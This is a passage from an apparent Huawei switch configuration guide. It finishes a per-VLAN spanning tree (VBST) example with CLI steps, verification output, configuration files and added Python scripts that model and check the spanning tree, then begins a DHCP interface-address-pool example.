[SwitchD] interface gigabitethernet 1/0/2
[SwitchD-GigabitEthernet1/0/2] stp vlan 20 cost 2000000
[SwitchD-GigabitEthernet1/0/2] stp vlan 30 cost 2000000
[SwitchD-GigabitEthernet1/0/2] quit

4. Enable VBST to eliminate loops.
– Disable VBST in VLAN 1 on all devices.
NOTE

By default, all ports join VLAN 1 and VBST is enabled in VLAN 1. To reduce spanning tree
calculation, disable VBST in VLAN 1. To prevent loops in VLAN 1 after VBST is disabled,
delete ports from VLAN 1.
# Disable VBST in VLAN 1 on SwitchA.
[SwitchA] stp vlan 1 disable

# Disable VBST in VLAN 1 on SwitchB.
[SwitchB] stp vlan 1 disable

# Disable VBST in VLAN 1 on SwitchC.
[SwitchC] stp vlan 1 disable

# Disable VBST in VLAN 1 on SwitchD.
[SwitchD] stp vlan 1 disable

# Delete GE1/0/1, GE1/0/2, and GE1/0/3 on SwitchA from VLAN 1.
[SwitchA] interface gigabitethernet 1/0/1
[SwitchA-GigabitEthernet1/0/1] undo port trunk allow-pass vlan 1
[SwitchA-GigabitEthernet1/0/1] quit
[SwitchA] interface gigabitethernet 1/0/2
[SwitchA-GigabitEthernet1/0/2] undo port trunk allow-pass vlan 1
[SwitchA-GigabitEthernet1/0/2] quit
[SwitchA] interface gigabitethernet 1/0/3
[SwitchA-GigabitEthernet1/0/3] undo port trunk allow-pass vlan 1
[SwitchA-GigabitEthernet1/0/3] quit

# Delete GE1/0/1, GE1/0/2, and GE1/0/3 on SwitchB from VLAN 1.
[SwitchB] interface gigabitethernet 1/0/1
[SwitchB-GigabitEthernet1/0/1] undo port trunk allow-pass vlan 1
[SwitchB-GigabitEthernet1/0/1] quit
[SwitchB] interface gigabitethernet 1/0/2
[SwitchB-GigabitEthernet1/0/2] undo port trunk allow-pass vlan 1
[SwitchB-GigabitEthernet1/0/2] quit
[SwitchB] interface gigabitethernet 1/0/3
[SwitchB-GigabitEthernet1/0/3] undo port trunk allow-pass vlan 1
[SwitchB-GigabitEthernet1/0/3] quit

# Delete GE1/0/2 and GE1/0/3 on SwitchC from VLAN 1.
[SwitchC] interface gigabitethernet 1/0/2
[SwitchC-GigabitEthernet1/0/2] undo port trunk allow-pass vlan 1
[SwitchC-GigabitEthernet1/0/2] quit
[SwitchC] interface gigabitethernet 1/0/3
[SwitchC-GigabitEthernet1/0/3] undo port trunk allow-pass vlan 1
[SwitchC-GigabitEthernet1/0/3] quit

# Delete GE1/0/2 and GE1/0/3 on SwitchD from VLAN 1.
[SwitchD] interface gigabitethernet 1/0/2
[SwitchD-GigabitEthernet1/0/2] undo port trunk allow-pass vlan 1
[SwitchD-GigabitEthernet1/0/2] quit
[SwitchD] interface gigabitethernet 1/0/3
[SwitchD-GigabitEthernet1/0/3] undo port trunk allow-pass vlan 1
[SwitchD-GigabitEthernet1/0/3] quit

– Enable VBST in a VLAN.
By default, VBST is enabled in a VLAN.
Run the display stp vlan vlan-id command to check the VBST status. If the
message "The protocol is disabled" is displayed, VBST is disabled in the VLAN.
Run the stp vlan vlan-id enable command in the system view to enable VBST in
the VLAN.
– Enable VBST on a port.
By default, VBST is enabled on a Layer 2 Ethernet interface.
Run the display stp interface interface-type interface-number command to check
the VBST status on a port. If the message "The protocol is disabled" is displayed,
VBST is disabled on the port. Run the stp enable command in the interface view to
enable VBST on the port.

Step 3 Configure ports connected to terminals as edge ports to improve topology convergence.

# On SwitchC and SwitchD, configure GE1/0/4 and GE1/0/5, which connect to terminals, as
edge ports. An edge port enters the forwarding state directly without taking part in spanning
tree calculation, so configure it only on ports that face terminals, never on ports toward
another switch. If an edge port receives a BPDU, it loses its edge attribute and is recalculated
as an ordinary port.
[SwitchC] interface gigabitethernet 1/0/4
[SwitchC-GigabitEthernet1/0/4] stp edged-port enable
[SwitchC-GigabitEthernet1/0/4] quit
[SwitchC] interface gigabitethernet 1/0/5
[SwitchC-GigabitEthernet1/0/5] stp edged-port enable
[SwitchC-GigabitEthernet1/0/5] quit
[SwitchD] interface gigabitethernet 1/0/4
[SwitchD-GigabitEthernet1/0/4] stp edged-port enable
[SwitchD-GigabitEthernet1/0/4] quit
[SwitchD] interface gigabitethernet 1/0/5
[SwitchD-GigabitEthernet1/0/5] stp edged-port enable
[SwitchD-GigabitEthernet1/0/5] quit
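The roadmap asks for one specific port to be blocked in each VLAN, and Step 2 achieves that with per-VLAN root priorities plus a path cost of 2000000 on the port to be blocked. The following Python script is an added example (not Huawei code, and not how the switch itself computes the tree) that runs the IEEE 802.1D election for each VLAN on the topology of Figure 7-12: the root bridge is the bridge with the lowest (priority, MAC) bridge ID; a bridge's root path cost is the cost advertised by its neighbour plus the cost of the port on which it is received; and on each link the end with the lower (root path cost, bridge ID, port ID) vector becomes the designated port, while the other end, unless it is that bridge's root port, is the alternate (blocked) port. Priorities follow the stp vlan ... root primary/secondary settings as display stp bridge local shows them (0 and 4096); the 802.1t cost 20000 is the Active value the page shows for a GE port; SwitchA's MAC is taken from that output and the other MACs are constructed. Timers, BPDU exchange and port state transitions are not modelled.

```python
"""Per-VLAN spanning tree election for the VBST design in this example.
Added example, not Huawei code: a model of the 802.1D election that shows
which port each bridge blocks in each VLAN, and why the cost override
in Step 2 is needed. Timers and state machines are not modelled."""
import heapq

# SwitchA's MAC comes from the display stp bridge local output on this page;
# the other MACs are constructed and only break ties between equal priorities.
MACS = {"SwitchA": "0200-0000-6703", "SwitchB": "0200-0000-6704",
        "SwitchC": "0200-0000-6705", "SwitchD": "0200-0000-6706"}
DEFAULT_PRIORITY = 32768
# stp vlan N root primary -> priority 0, root secondary -> 4096 (Step 2.2).
PRIORITY = {("SwitchA", 10): 0, ("SwitchB", 10): 4096,
            ("SwitchA", 20): 0, ("SwitchB", 20): 4096,
            ("SwitchB", 30): 0, ("SwitchA", 30): 4096}
# Links of Figure 7-12: (bridge, port, bridge, port, VLANs allowed on the trunk).
LINKS = [("SwitchA", "GE1/0/1", "SwitchB", "GE1/0/1", {10, 20, 30}),
         ("SwitchA", "GE1/0/3", "SwitchC", "GE1/0/3", {10, 20}),
         ("SwitchA", "GE1/0/2", "SwitchD", "GE1/0/2", {20, 30}),
         ("SwitchB", "GE1/0/2", "SwitchC", "GE1/0/2", {10, 20}),
         ("SwitchB", "GE1/0/3", "SwitchD", "GE1/0/3", {20, 30})]
DEFAULT_COST = 20000   # 802.1t cost of a GE port (Active=20000 in display stp vlan 10)
# Step 2.3: 'stp vlan N cost 2000000' on the ports that are to be blocked.
COST_OVERRIDES = {("SwitchC", "GE1/0/2", 10): 2000000, ("SwitchC", "GE1/0/2", 20): 2000000,
                  ("SwitchD", "GE1/0/2", 20): 2000000, ("SwitchD", "GE1/0/2", 30): 2000000}


def bridge_id(bridge, vlan):
    """Bridge ID = (priority, MAC); lower wins."""
    return (PRIORITY.get((bridge, vlan), DEFAULT_PRIORITY), MACS[bridge])


def port_id(port):
    """Port ID = (port priority 128, port number), as in 128.4093 on the page."""
    return (128, int(port.rsplit("/", 1)[1]))


def port_roles(vlan, overrides=COST_OVERRIDES):
    """Return {(bridge, port): 'ROOT' | 'DESI' | 'ALTE'} for one VLAN's tree."""
    def cost(bridge, port):
        return overrides.get((bridge, port, vlan), DEFAULT_COST)

    # neighbours[b] = [(own port, peer bridge, peer port)] over links carrying the VLAN.
    neighbours = {}
    for a, pa, b, pb, vlans in LINKS:
        if vlan in vlans:
            neighbours.setdefault(a, []).append((pa, b, pb))
            neighbours.setdefault(b, []).append((pb, a, pa))
    root = min(neighbours, key=lambda b: bridge_id(b, vlan))

    # Root path cost (RPC): the cost advertised by the peer plus the cost of the
    # port it is received on, so a raised cost penalises only the receiving side.
    rpc, heap = {root: 0}, [(0, root)]
    while heap:
        c, b = heapq.heappop(heap)
        if c > rpc[b]:
            continue
        for _, peer, peer_port in neighbours[b]:
            candidate = c + cost(peer, peer_port)
            if candidate < rpc.get(peer, float("inf")):
                rpc[peer] = candidate
                heapq.heappush(heap, (candidate, peer))

    roles = {}
    for b, links in neighbours.items():
        root_port = None
        if b != root:   # best (RPC via port, peer bridge ID, peer port ID, own port ID)
            root_port = min(links, key=lambda lnk: (rpc[lnk[1]] + cost(b, lnk[0]),
                                                     bridge_id(lnk[1], vlan), port_id(lnk[2]), port_id(lnk[0])))[0]
        for own, peer, peer_port in links:
            mine = (rpc[b], bridge_id(b, vlan), port_id(own))
            theirs = (rpc[peer], bridge_id(peer, vlan), port_id(peer_port))
            if own == root_port:
                roles[(b, own)] = "ROOT"
            elif mine < theirs:
                roles[(b, own)] = "DESI"   # this end is the designated port
            else:
                roles[(b, own)] = "ALTE"   # peer is designated; this end is blocked
    return roles


def blocked_ports(vlan, overrides=COST_OVERRIDES):
    """Ports that end up discarding in the given VLAN."""
    return sorted(p for p, r in port_roles(vlan, overrides).items() if r == "ALTE")
```

Calling blocked_ports(20, {}) shows why the cost override matters: with default costs SwitchD would choose its direct link to the VLAN 20 root (GE1/0/2 toward SwitchA) as its root port and block GE1/0/3, not GE1/0/2 as the design requires. In VLAN 10 and VLAN 30 the override changes nothing, because the access switch already reaches the root directly over the port the design leaves open; in those VLANs it only guards the choice against future cost or priority changes.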

Step 4 Verify the configuration.

After the configuration is complete and the network topology becomes stable, perform the
following operations to verify the configuration.

# Run the display stp bridge local command on SwitchA to check the STP working mode.
[SwitchA] display stp bridge local
VLAN-ID Bridge ID Hello Max Forward Protocol
Time Age Delay
----- -------------------- ----- --- ------- ---------------------------
10 0.0200-0000-6703 2 20 15 VBST
20 0.0200-0000-6703 2 20 15 VBST
30 4096.0200-0000-6703 2 20 15 VBST

The preceding information shows that the VBST mode is used.

# Run the display stp brief command on SwitchA to check the port status.
[SwitchA] display stp brief
VLAN-ID Port Role STP State Protection
10 GigabitEthernet1/0/1 DESI FORWARDING NONE
10 GigabitEthernet1/0/3 DESI FORWARDING NONE
20 GigabitEthernet1/0/1 DESI FORWARDING NONE
20 GigabitEthernet1/0/2 DESI FORWARDING NONE
20 GigabitEthernet1/0/3 DESI FORWARDING NONE
30 GigabitEthernet1/0/1 ROOT FORWARDING NONE
30 GigabitEthernet1/0/2 DESI FORWARDING NONE

The preceding information shows that SwitchA participates in spanning tree calculation in
VLAN 10, VLAN 20, and VLAN 30. For example, SwitchA is the root bridge in VLAN 10
and VLAN 20, so GE1/0/1 and GE1/0/3 in VLAN 10 are selected as designated ports.
GE1/0/1, GE1/0/2, and GE1/0/3 in VLAN 20 are selected as designated ports. SwitchA is the
secondary root bridge in VLAN 30, so GE1/0/1 is selected as the root port and GE1/0/2 is
selected as the designated port in VLAN 30.
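Comparing this output with the intended design is normally done by eye. The following Python script is an added example (not Huawei code) that parses display stp brief output collected from all four switches and checks it against the design in the roadmap: in each VLAN, the switch that reports no ROOT port is the root bridge and must be the one the design made root (a different root means a bridge with a better bridge ID, possibly an unauthorised one, has taken over that VLAN); every other switch must report exactly one ROOT port; and the set of DISCARDING ports must be exactly the ports the design blocks. It also lists designated ports on the root bridges that still show Protection NONE, which are the candidates for root protection mentioned in the Configuration Notes. The embedded input is the display stp brief output shown in this example for SwitchA, SwitchB, SwitchC and SwitchD.

```python
"""Check 'display stp brief' output from several switches against the
intended VBST design. Added example, not Huawei code."""
import re

# Constructed input: the display stp brief output shown on this page.
OUTPUTS = {
    "SwitchA": """
VLAN-ID Port Role STP State Protection
10 GigabitEthernet1/0/1 DESI FORWARDING NONE
10 GigabitEthernet1/0/3 DESI FORWARDING NONE
20 GigabitEthernet1/0/1 DESI FORWARDING NONE
20 GigabitEthernet1/0/2 DESI FORWARDING NONE
20 GigabitEthernet1/0/3 DESI FORWARDING NONE
30 GigabitEthernet1/0/1 ROOT FORWARDING NONE
30 GigabitEthernet1/0/2 DESI FORWARDING NONE
""",
    "SwitchB": """
VLAN-ID Port Role STP State Protection
10 GigabitEthernet1/0/1 ROOT FORWARDING NONE
10 GigabitEthernet1/0/2 DESI FORWARDING NONE
20 GigabitEthernet1/0/1 ROOT FORWARDING NONE
20 GigabitEthernet1/0/2 DESI FORWARDING NONE
20 GigabitEthernet1/0/3 DESI FORWARDING NONE
30 GigabitEthernet1/0/1 DESI FORWARDING NONE
30 GigabitEthernet1/0/3 DESI FORWARDING NONE
""",
    "SwitchC": """
VLAN-ID Port Role STP State Protection
10 GigabitEthernet1/0/2 ALTE DISCARDING NONE
10 GigabitEthernet1/0/3 ROOT FORWARDING NONE
10 GigabitEthernet1/0/4 DESI FORWARDING NONE
20 GigabitEthernet1/0/2 ALTE DISCARDING NONE
20 GigabitEthernet1/0/3 ROOT FORWARDING NONE
20 GigabitEthernet1/0/5 DESI FORWARDING NONE
""",
    "SwitchD": """
VLAN-ID Port Role STP State Protection
20 GigabitEthernet1/0/2 ALTE DISCARDING NONE
20 GigabitEthernet1/0/3 ROOT FORWARDING NONE
20 GigabitEthernet1/0/4 DESI FORWARDING NONE
30 GigabitEthernet1/0/2 ALTE DISCARDING NONE
30 GigabitEthernet1/0/3 ROOT FORWARDING NONE
30 GigabitEthernet1/0/5 DESI FORWARDING NONE
""",
}

# Design from the configuration roadmap: root bridge per VLAN and the ports to block.
EXPECTED_ROOT = {10: "SwitchA", 20: "SwitchA", 30: "SwitchB"}
EXPECTED_BLOCKED = {("SwitchC", "GigabitEthernet1/0/2", 10), ("SwitchC", "GigabitEthernet1/0/2", 20),
                    ("SwitchD", "GigabitEthernet1/0/2", 20), ("SwitchD", "GigabitEthernet1/0/2", 30)}

ROW = re.compile(r"^(\d+)\s+(\S+)\s+(ROOT|DESI|ALTE|BACK|MAST)\s+(FORWARDING|LEARNING|DISCARDING)\s+(\S+)$")


def parse_brief(text):
    """Rows of (vlan, port, role, state, protection); the header line is skipped."""
    rows = []
    for line in text.splitlines():
        m = ROW.match(line.strip())
        if m:
            rows.append((int(m.group(1)), m.group(2), m.group(3), m.group(4), m.group(5)))
    return rows


def check_topology(outputs, expected_root=EXPECTED_ROOT, expected_blocked=EXPECTED_BLOCKED):
    """Return findings; an empty list means the live tree matches the design."""
    findings = []
    rows = {sw: parse_brief(text) for sw, text in outputs.items()}
    vlans = sorted({r[0] for sw_rows in rows.values() for r in sw_rows})
    for vlan in vlans:
        # Switches present in this VLAN and the ROOT ports each one reports.
        root_ports = {sw: [r[1] for r in sw_rows if r[0] == vlan and r[2] == "ROOT"]
                      for sw, sw_rows in rows.items() if any(r[0] == vlan for r in sw_rows)}
        roots = [sw for sw, ports in root_ports.items() if not ports]
        if roots != [expected_root.get(vlan)]:
            findings.append(f"VLAN {vlan}: root bridge is {roots or 'not among these switches'}, "
                            f"expected {expected_root.get(vlan)}")
        for sw, ports in root_ports.items():
            if len(ports) > 1:
                findings.append(f"VLAN {vlan}: {sw} reports {len(ports)} ROOT ports")
    blocked = {(sw, r[1], r[0]) for sw, sw_rows in rows.items() for r in sw_rows if r[3] == "DISCARDING"}
    for sw, port, vlan in sorted(expected_blocked - blocked):
        findings.append(f"VLAN {vlan}: {sw} {port} should be blocked but is not")
    for sw, port, vlan in sorted(blocked - expected_blocked):
        findings.append(f"VLAN {vlan}: {sw} {port} is blocked but the design does not expect it")
    return findings


def unprotected_root_ports(outputs, expected_root=EXPECTED_ROOT):
    """Designated ports on a VLAN's root bridge that have no protection configured."""
    return sorted((sw, port, vlan) for sw, text in outputs.items()
                  for vlan, port, role, _, prot in parse_brief(text)
                  if expected_root.get(vlan) == sw and role == "DESI" and prot == "NONE")
```

If every switch in a VLAN reports a ROOT port, the root lies outside the monitored set, which is exactly what a rogue bridge with priority 0 looks like from the aggregation layer; running check_topology periodically against freshly collected output turns that into a finding rather than a surprise.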

# Run the display stp vlan 10 command on SwitchA to check detailed information about
VLAN 10.
[SwitchA] display stp vlan 10
-------[VLAN 10 Global Info]-------
Bridge ID :0 .0200-0000-6703
Config Times :Hello 2s MaxAge 20s FwDly 15s
Active Times :Hello 2s MaxAge 20s FwDly 15s
Root ID / RPC :0 .0200-0000-6703 / 0 (This bridge is the root)
RootPortId :0.0
Root Type :Primary
----[Port4093(GigabitEthernet1/0/1)][FORWARDING]----
Port Role :Designated Port
Port Priority :128
Port Cost(Dot1T) :Config=Auto / Active=20000
Desg. Bridge/Port :0 .0200-0000-6703 / 128.4093
Port Edged :Config=Default / Active=Disabled
Point-to-point :Config=Auto / Active=true
Transit Limit :6 packets/hello
Protection Type :None
----[Port4092(GigabitEthernet1/0/3)][FORWARDING]----
Port Role :Designated Port
Port Priority :128
Port Cost(Dot1T) :Config=Auto / Active=199999
Desg. Bridge/Port :0 .0200-0000-6703 / 128.4092
Port Edged :Config=Default / Active=Disabled
Point-to-point :Config=Auto / Active=true
Transit Limit :6 packets/hello
Protection Type :None

The preceding information shows that SwitchA is selected as the root bridge in VLAN 10 and
GE1/0/1 and GE1/0/3 are selected as designated ports in FORWARDING state.

# Run the display stp brief command on SwitchB, SwitchC, and SwitchD to check the port
status.
[SwitchB] display stp brief
VLAN-ID Port Role STP State Protection
10 GigabitEthernet1/0/1 ROOT FORWARDING NONE
10 GigabitEthernet1/0/2 DESI FORWARDING NONE
20 GigabitEthernet1/0/1 ROOT FORWARDING NONE
20 GigabitEthernet1/0/2 DESI FORWARDING NONE
20 GigabitEthernet1/0/3 DESI FORWARDING NONE
30 GigabitEthernet1/0/1 DESI FORWARDING NONE
30 GigabitEthernet1/0/3 DESI FORWARDING NONE
[SwitchC] display stp brief
VLAN-ID Port Role STP State Protection
10 GigabitEthernet1/0/2 ALTE DISCARDING NONE
10 GigabitEthernet1/0/3 ROOT FORWARDING NONE
10 GigabitEthernet1/0/4 DESI FORWARDING NONE
20 GigabitEthernet1/0/2 ALTE DISCARDING NONE
20 GigabitEthernet1/0/3 ROOT FORWARDING NONE
20 GigabitEthernet1/0/5 DESI FORWARDING NONE
[SwitchD] display stp brief
VLAN-ID Port Role STP State Protection
20 GigabitEthernet1/0/2 ALTE DISCARDING NONE
20 GigabitEthernet1/0/3 ROOT FORWARDING NONE
20 GigabitEthernet1/0/4 DESI FORWARDING NONE
30 GigabitEthernet1/0/2 ALTE DISCARDING NONE
30 GigabitEthernet1/0/3 ROOT FORWARDING NONE
30 GigabitEthernet1/0/5 DESI FORWARDING NONE

The preceding information shows that SwitchB participates in spanning tree calculation in
VLAN 10, VLAN 20, and VLAN 30, SwitchC participates in spanning tree calculation in
VLAN 10 and VLAN 20, and SwitchD participates in spanning tree calculation in VLAN 20
and VLAN 30. After the calculation is complete, ports are selected as different roles to
eliminate loops.
Different spanning trees are formed in VLAN 10, VLAN 20, and VLAN 30, and traffic in
VLAN 10, VLAN 20, and VLAN 30 is forwarded along different spanning trees to implement
load balancing.
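The following script is an added example for this verification step; it is not part of the Huawei document. It parses the display stp brief output of the four switches shown above (embedded here as constructed sample text, using the role abbreviations ROOT, DESI and ALTE exactly as the switches print them) and checks, per VLAN, the properties the text describes: exactly one participating switch has no root port (it is that VLAN's root bridge), every other participant has exactly one root port, and no root or designated port is left in a non-forwarding state. Run against the sample it reports SwitchA as the root in VLAN 10 and VLAN 20 and SwitchB in VLAN 30, with no problems.

```python
import re
from collections import defaultdict

# Constructed sample: the "display stp brief" output of the four switches in
# this example, pasted together the way an operator would collect it.
STP_BRIEF_OUTPUT = """\
[SwitchA] display stp brief
VLAN-ID Port Role STP State Protection
10 GigabitEthernet1/0/1 DESI FORWARDING NONE
10 GigabitEthernet1/0/3 DESI FORWARDING NONE
20 GigabitEthernet1/0/1 DESI FORWARDING NONE
20 GigabitEthernet1/0/2 DESI FORWARDING NONE
20 GigabitEthernet1/0/3 DESI FORWARDING NONE
30 GigabitEthernet1/0/1 ROOT FORWARDING NONE
30 GigabitEthernet1/0/2 DESI FORWARDING NONE
[SwitchB] display stp brief
VLAN-ID Port Role STP State Protection
10 GigabitEthernet1/0/1 ROOT FORWARDING NONE
10 GigabitEthernet1/0/2 DESI FORWARDING NONE
20 GigabitEthernet1/0/1 ROOT FORWARDING NONE
20 GigabitEthernet1/0/2 DESI FORWARDING NONE
20 GigabitEthernet1/0/3 DESI FORWARDING NONE
30 GigabitEthernet1/0/1 DESI FORWARDING NONE
30 GigabitEthernet1/0/3 DESI FORWARDING NONE
[SwitchC] display stp brief
VLAN-ID Port Role STP State Protection
10 GigabitEthernet1/0/2 ALTE DISCARDING NONE
10 GigabitEthernet1/0/3 ROOT FORWARDING NONE
10 GigabitEthernet1/0/4 DESI FORWARDING NONE
20 GigabitEthernet1/0/2 ALTE DISCARDING NONE
20 GigabitEthernet1/0/3 ROOT FORWARDING NONE
20 GigabitEthernet1/0/5 DESI FORWARDING NONE
[SwitchD] display stp brief
VLAN-ID Port Role STP State Protection
20 GigabitEthernet1/0/2 ALTE DISCARDING NONE
20 GigabitEthernet1/0/3 ROOT FORWARDING NONE
20 GigabitEthernet1/0/4 DESI FORWARDING NONE
30 GigabitEthernet1/0/2 ALTE DISCARDING NONE
30 GigabitEthernet1/0/3 ROOT FORWARDING NONE
30 GigabitEthernet1/0/5 DESI FORWARDING NONE
"""

PROMPT_RE = re.compile(r"^\[(\S+)\] display stp brief$")
PORT_RE = re.compile(r"^(\d+)\s+(\S+)\s+(\S+)\s+(FORWARDING|DISCARDING|LEARNING)\s+(\S+)$")


def parse_stp_brief(text):
    """Return {switch: {vlan: [(port, role, state, protection), ...]}}."""
    result = defaultdict(lambda: defaultdict(list))
    switch = None
    for line in text.splitlines():
        line = line.strip()
        m = PROMPT_RE.match(line)
        if m:
            switch = m.group(1)       # following rows belong to this switch
            continue
        m = PORT_RE.match(line)
        if m and switch is not None:
            vlan, port, role, state, protection = m.groups()
            result[switch][int(vlan)].append((port, role, state, protection))
    return result


def check_vbst_topology(parsed):
    """Per VLAN: the switch with no ROOT port is the root bridge and there must
    be exactly one; every other participant has exactly one ROOT port; ROOT and
    DESI ports must be FORWARDING. Returns {vlan: (root_bridge, [problems])}."""
    vlans = sorted({v for per_vlan in parsed.values() for v in per_vlan})
    report = {}
    for vlan in vlans:
        problems, root_bridges = [], []
        for switch, per_vlan in parsed.items():
            if vlan not in per_vlan:
                continue              # this switch does not participate in the VLAN
            ports = per_vlan[vlan]
            root_ports = [p for p in ports if p[1] == "ROOT"]
            if not root_ports:
                root_bridges.append(switch)
            elif len(root_ports) > 1:
                problems.append(f"{switch} has {len(root_ports)} root ports in VLAN {vlan}")
            for port, role, state, _ in ports:
                if role in ("ROOT", "DESI") and state != "FORWARDING":
                    problems.append(f"{switch} {port} is {role} but {state} in VLAN {vlan}")
        if len(root_bridges) != 1:
            problems.append(f"VLAN {vlan}: expected one root bridge, found {root_bridges}")
        report[vlan] = (root_bridges[0] if len(root_bridges) == 1 else None, problems)
    return report


if __name__ == "__main__":
    for vlan, (root, problems) in check_vbst_topology(parse_stp_brief(STP_BRIEF_OUTPUT)).items():
        print(f"VLAN {vlan}: root bridge {root}, problems {problems or 'none'}")
```

The check is deliberately conservative: it only consumes what display stp brief prints, so it can be run over collected output from every switch without any configuration access, and a VLAN with zero or two root-bridge candidates (the symptom of a VLAN that is not allowed on a trunk, or of a duplicate bridge priority) shows up as a problem rather than being silently accepted.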

----End

Configuration Files
l Configuration file of SwitchA
#
sysname SwitchA
#
vlan batch 10 20 30
#
stp mode vbst
#
stp vlan 1 disable
stp vlan 30 root secondary
stp vlan 10 20 root primary
#
interface GigabitEthernet1/0/1
port link-type trunk
undo port trunk allow-pass vlan 1
port trunk allow-pass vlan 10 20 30
#
interface GigabitEthernet1/0/2
port link-type trunk
undo port trunk allow-pass vlan 1
port trunk allow-pass vlan 20 30
#
interface GigabitEthernet1/0/3
port link-type trunk
undo port trunk allow-pass vlan 1
port trunk allow-pass vlan 10 20
#
return

l Configuration file of SwitchB
#
sysname SwitchB
#
vlan batch 10 20 30
#
stp mode vbst
#
stp vlan 1 disable
stp vlan 10 20 root secondary
stp vlan 30 root primary
#
interface GigabitEthernet1/0/1
port link-type trunk
undo port trunk allow-pass vlan 1
port trunk allow-pass vlan 10 20 30
#
interface GigabitEthernet1/0/2
port link-type trunk
undo port trunk allow-pass vlan 1
port trunk allow-pass vlan 10 20
#
interface GigabitEthernet1/0/3
port link-type trunk
undo port trunk allow-pass vlan 1
port trunk allow-pass vlan 20 30
#
return

l Configuration file of SwitchC
#
sysname SwitchC
#
vlan batch 10 20
#
stp mode vbst
#
stp vlan 1 disable
#
interface GigabitEthernet1/0/2
port link-type trunk
undo port trunk allow-pass vlan 1
port trunk allow-pass vlan 10 20
stp vlan 10 20 cost 2000000
#
interface GigabitEthernet1/0/3
port link-type trunk
undo port trunk allow-pass vlan 1
port trunk allow-pass vlan 10 20
#
interface GigabitEthernet1/0/4
port link-type access
port default vlan 10
stp edged-port enable
#
interface GigabitEthernet1/0/5
port link-type access
port default vlan 20
stp edged-port enable
#
return

l Configuration file of SwitchD
#
sysname SwitchD
#
vlan batch 20 30
#
stp mode vbst
#
stp vlan 1 disable
#
interface GigabitEthernet1/0/2
port link-type trunk
undo port trunk allow-pass vlan 1
port trunk allow-pass vlan 20 30
stp vlan 20 30 cost 2000000
#
interface GigabitEthernet1/0/3
port link-type trunk
undo port trunk allow-pass vlan 1
port trunk allow-pass vlan 20 30
#
interface GigabitEthernet1/0/4
port link-type access
port default vlan 20
stp edged-port enable
#
interface GigabitEthernet1/0/5
port link-type access
port default vlan 30
stp edged-port enable
#
return

8 Typical IP Service Configuration

About This Chapter

8.1 Typical DHCP Configuration

8.1 Typical DHCP Configuration

8.1.1 Example for Configuring the Device as a DHCP Server (Based on the Interface Address Pool)

DHCP Server Overview
Users require that all terminals on a network dynamically obtain network parameters such as
IP addresses, the DNS server IP address, routing information, and gateway information, so that
the network parameters, including terminal IP addresses, do not need to be configured manually.
In addition, mobile terminals (for example, mobile phones, tablets, and laptops) should support
plug-and-play, without the network parameters being modified each time they connect. To meet
these requirements, the DHCP server function can be configured on an aggregation-layer user
gateway or a core-layer device to assign network parameters such as IP addresses to
terminals.
The Dynamic Host Configuration Protocol (DHCP) uses the client/server model to
dynamically configure and uniformly manage network parameters for users. The DHCP
server assigns network parameters such as IP addresses from an address pool, which can be
either a global address pool or an interface address pool.
An interface address pool is simple to configure, but it can be used only when the users and
the DHCP server belong to the same network segment, and the server can assign network
parameters only to the users on that interface. It is applicable to small networks with a
limited number of devices and a manageable configuration and maintenance workload. After
the DHCP server function based on the interface address pool is configured on the user
gateway, the hosts and mobile terminals on the interface obtain network parameters such as
IP addresses automatically, without manual configuration or modification.
Compared with an interface address pool, a global address pool can be applied to large
networks. The DHCP server function based on the global address pool should be configured
on a core device, or a dedicated DHCP server should be used to assign network parameters
such as IP addresses; the user gateway then only needs the DHCP relay function enabled. For
details, see 8.1.4 Example for Configuring the Device as a DHCP Relay (on the Same
Network).

Configuration Notes
This example applies to all versions of the S12700 switches.

NOTE
To know details about software mappings, see Switch Software Mapping Search.

Networking Requirements
As shown in Figure 8-1, an enterprise divides two network segments for office terminals:
10.1.1.0/24 for employees with fixed office terminals and 10.1.2.0/24 for employees on
business trips to temporarily access the network. The enterprise requires that DHCP be used
to assign IP addresses to employees with fixed office terminals and employees on business
trips. A PC (DHCP Client_1) requires fixed IP address 10.1.1.100/24 to meet service
requirements.

Figure 8-1 Networking diagram for configuring the device as a DHCP server
(Figure not reproduced. The Switch, acting as the DHCP server, connects to the Internet.
GE1/0/1 belongs to VLANIF10 (10.1.1.1/24) and, through LSW_1, serves DHCP Client_1
(MAC 286e-d488-b684, IP 10.1.1.100/24) ... DHCP Client_n, the employees with fixed office
terminals. GE1/0/2 belongs to VLANIF11 (10.1.2.1/24) and, through LSW_2, serves DHCP
Client_s ... DHCP Client_t, the employees on business trips.)

Configuration Roadmap
The configuration roadmap is as follows:
Configure the DHCP server function on the Switch to dynamically assign IP addresses to the
terminals on the two network segments. Configure the IP address lease to 30 days for the
employees with fixed office terminals on 10.1.1.0/24 and one day for the employees on
business trips on 10.1.2.0/24 to temporarily access the network.

NOTE

Configure the interface link types and VLANs on LSW_1 and LSW_2 to implement Layer 2 communication.

Procedure
Step 1 Enable the DHCP service. By default, the service is disabled.
<HUAWEI> system-view
[HUAWEI] sysname Switch
[Switch] dhcp enable

Step 2 Add interfaces to VLANs.

# Add GE1/0/1 to VLAN 10.
[Switch] vlan batch 10 to 11
[Switch] interface gigabitethernet 1/0/1
[Switch-GigabitEthernet1/0/1] port link-type access
[Switch-GigabitEthernet1/0/1] port default vlan 10
[Switch-GigabitEthernet1/0/1] quit

# Add GE1/0/2 to VLAN 11.
[Switch] interface gigabitethernet 1/0/2
[Switch-GigabitEthernet1/0/2] port link-type access
[Switch-GigabitEthernet1/0/2] port default vlan 11
[Switch-GigabitEthernet1/0/2] quit

Step 3 Configure IP addresses for VLANIF interfaces.

# Configure an IP address for VLANIF 10.
[Switch] interface vlanif 10
[Switch-Vlanif10] ip address 10.1.1.1 24 //Network segment assigned by the enterprise for fixed office terminals
[Switch-Vlanif10] quit

# Configure an IP address for VLANIF 11.
[Switch] interface vlanif 11
[Switch-Vlanif11] ip address 10.1.2.1 24 //Network segment assigned by the enterprise for employees on business trips
[Switch-Vlanif11] quit

Step 4 Configure an interface address pool.

# Configure the terminals connected to VLANIF 10 to obtain IP addresses from the interface
address pool.
[Switch] interface vlanif 10
[Switch-Vlanif10] dhcp select interface //Enable the DHCP server function based on the interface address pool on the interface. By default, the function is disabled.
[Switch-Vlanif10] dhcp server lease day 30 //The default lease is one day. Modify the lease to 30 days.
[Switch-Vlanif10] dhcp server static-bind ip-address 10.1.1.100 mac-address 286e-d488-b684 //Allocate a fixed IP address to Client_1.
[Switch-Vlanif10] quit

# Configure the terminals connected to VLANIF 11 to obtain IP addresses from the interface
address pool. The default lease (one day) is used and does not need to be configured.
[Switch] interface vlanif 11
[Switch-Vlanif11] dhcp select interface //Enable the DHCP server function based on the interface address pool on the interface. By default, the function is disabled.
